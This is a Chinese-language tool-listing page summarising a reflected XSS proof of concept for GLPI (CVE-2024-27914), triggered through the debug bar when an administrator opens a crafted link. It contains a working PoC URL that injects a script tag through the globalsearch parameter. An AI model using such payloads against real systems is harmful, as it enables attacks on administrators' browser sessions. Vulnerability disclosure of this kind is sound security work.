黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对GLPI的反射型XSS利用PoC(CVE-2024-27914),目标为未经认证的调试模式。提供一个恶意链接,通过调试栏在管理员浏览器中触发XSS。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
未认证用户可向 GLPI 管理员提供恶意链接以利用反射型 XSS 漏洞。仅当管理员通过调试栏导航时,该 XSS 才会触发。
PoC - http://<host>/glpi/front/search.php?globalsearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://<host>/glpi/front/search.php?globalsearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
参考: